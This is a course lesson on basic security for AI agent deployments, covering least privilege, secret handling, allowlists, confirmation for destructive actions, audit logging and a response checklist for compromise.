Module 9: From Toy to System•Lesson 3 of 6
Security Basics
Security Basics
Your agent has access to things. Protect them.
The Threat Model
Your agent can potentially:
- Read sensitive files
- Execute arbitrary commands
- Send data to external services
- Spend money (API calls)
- Act on your behalf
Security Principles
1. Least Privilege
Give the agent only what it needs.
# Bad: Full access
tools:
- exec # Can run ANY command
# Better: Restricted
tools:
- exec:
allowlist:
- "git *"
- "npm *"
- "ls *"2. Never Hardcode Secrets
# Bad
providers:
openai:
apiKey: "sk-abc123..." # In version control!
# Good
providers:
openai:
apiKey: ${OPENAI_API_KEY} # From environmentStore secrets in:
- Environment variables
.envfiles (gitignored)- Secret managers
3. Allowlist, Don't Blocklist
# Bad: Trying to block bad things
channels:
telegram:
blocklist: [123, 456, 789] # Will miss attackers
# Good: Allow only known good
channels:
telegram:
allowlist: [your_user_id] # Only you can access4. Confirm Destructive Actions
In AGENTS.md:
## Safety Rules
Before any of these, ASK FOR CONFIRMATION:
- Deleting files (use trash, not rm)
- Sending external messages
- Spending money
- Modifying system config5. Audit Logging
Keep logs of what the agent does:
logging:
level: info
file: ./logs/agent.log
maxSize: 10mb
maxFiles: 5Review periodically for unexpected behavior.
Security Checklist
- API keys in environment, not config
- Allowlist for channel access
- Restricted command execution
- Confirmation for destructive actions
- Logging enabled
- Config files gitignored appropriately
- Regular log review
- Backup of workspace
If Compromised
- Revoke API keys immediately
- Stop the agent
- Review logs for what happened
- Rotate all secrets
- Audit what was accessed
- Fix the vulnerability before restarting